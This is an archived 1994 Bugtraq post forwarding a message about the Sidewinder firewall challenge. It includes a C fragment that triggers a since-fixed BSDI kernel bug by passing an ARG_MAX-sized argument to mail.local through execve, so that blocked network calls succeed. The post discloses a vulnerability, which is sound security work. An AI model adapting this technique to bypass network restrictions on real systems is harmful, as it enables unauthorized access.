Bugtraq mailing list archives

Yesterday this would have worked... (fwd)


From: matt () worldlinx com (Matthew Harding)
Date: Fri, 16 Dec 1994 14:12:51 -0500 (EST)


Oops, I posted the previous message to bugtraq not realizing that SCTC
originally sent the message to the sneakers list. Here is the original
message posted with permission, 10 points to anyone who can spot the
supposed flaw in the BSDI O/S with this. BTW, anyone care to comment if
this should be replicable across platforms?

Cheers,
Matthew (matt () worldlinx com)


Forwarded message:
From owner-sneakers () CS YALE EDU Wed Dec 14 15:07:45 1994
Message-Id: <199412141927.NAA06239 () spirit sctc com>
Date: 14 Dec 1994 13:35:25 -0600
From: Glenn Andreas <andreas () sctc com>
Subject: Yesterday this would have worked...
To: "sneakers () CS YALE EDU" <sneakers () CS YALE EDU>
X-Mailer: Mail*Link PT/Internet 1.0.1
Sender: owner-sneakers () CS YALE EDU
Precedence: bulk


For those of you who think that the Sidewinder challenge was impossible, the
following code fragment would have allowed you to get at the internal net and
win a jacket.  This, of course, was yesterday (and the kernel has since been
fixed).  You just would have had to add this fragment at the beginning of
your favorite telnet client code (or whatever you wanted to use to get at the
other side of the network), and suddenly all your socket, bind, etc... calls
would succeed.  As for exactly how this fragment worked, that would be
telling... (but suffice it to say that this approach won't help when we go to
4.4, but probably not for the obvious reasons).


#include <unistd.h>     /* execve() */
#include <stdlib.h>     /* malloc() */
#include <string.h>     /* memset() */
#include <sys/param.h>  /* ARG_MAX */

....
int
main(int argc, char **argv, char **envp)
{
        char *argv1[2];

        /* build our new argv: one argument exactly ARG_MAX bytes long,
         * NUL-terminated, followed by the terminating NULL pointer... */
        argv1[0] = malloc(ARG_MAX + 1);
        memset(argv1[0], 'x', ARG_MAX);
        argv1[0][ARG_MAX] = 0;
        argv1[1] = NULL;
        /* exercise the bug... (execve() only returns here if it failed) */
        execve("/usr/libexec/mail.local", argv1, envp);
        /* and at this point we can get at the net... */
[ insert your favorite telnet client code here.... ]



---
"You think that's funny?  I'll show you funny..."

